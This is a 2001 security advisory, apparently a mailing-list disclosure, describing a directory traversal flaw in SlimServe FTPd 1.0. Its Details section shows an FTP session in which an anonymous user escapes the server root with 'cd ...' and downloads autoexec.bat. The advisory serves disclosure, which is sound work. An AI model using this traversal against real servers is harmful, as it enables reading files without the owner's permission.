Vulnerability in SlimServe FTPd

[joetesta () HUSHMAIL COM]

----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in SlimServe FTPd



    Overview

SlimServe FTPd v1.0 is an ftp server available from
http://www.whitsoftdev.com and http://www.download.com.  A vulnerability
exists which allows an attacker to break out of the ftp root using
relative paths (ie: '...').



    Details

The following is an illustration of the problem.  An ftp root of
"c:\directory\directory" was used.

% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>





    Solution

No quick fix is possible.



    Vendor Status

WhitSoft Development was contacted via <mwhitlock () whitsoftdev com> on
Tuesday, February 20, 2001.  No reply was received.



    - Joe Testa  ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
BdKXWOXtYQqLBhT0XXyjq8msVo/YPcLXDI/inYF7lTcYeYbHERn9vjPhP0RMD5HnALmF
aUXa8uek5Zpm2ZUukmAqMH03zA997x1MYtzHqvdpyU/7XfZIDynkrEoAp+beYPx72IED
Xxve3ecqaTmG3BdenblWF9UrjkXcpIRNPi3PoAG91Ql3NikjXeVh+pUlogh3MDJ1XO1O
/Z5tFkbqsqKIe6f5ezRD7oxtecFxOEtjMNYQuQTFEaUJBF3x7ydAxYvMLn1Xi+332cJ/
+lC/ra1vkow1kaCCTigBxTgdcueMgfduO0zqd2bFNdyWK8llHT/LFqDGPL3+zkex/U/e
Sd9wEtkqBQuutyL/M9ZxY/r7XIrWdwm4VG+AKKEhsRCzenLgUaiJMGjp+8SnZ/+jf3bD
ga/OkZztzza0pOBimOdlfRSWqSQX2iE77gpExvdo/4y5ZK+VSGx1zQ1q4k2yESNruhRH
owvo0nu7h/9qW2/D+jnLgnz1j7D972sxrDJWwe+JZHof
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com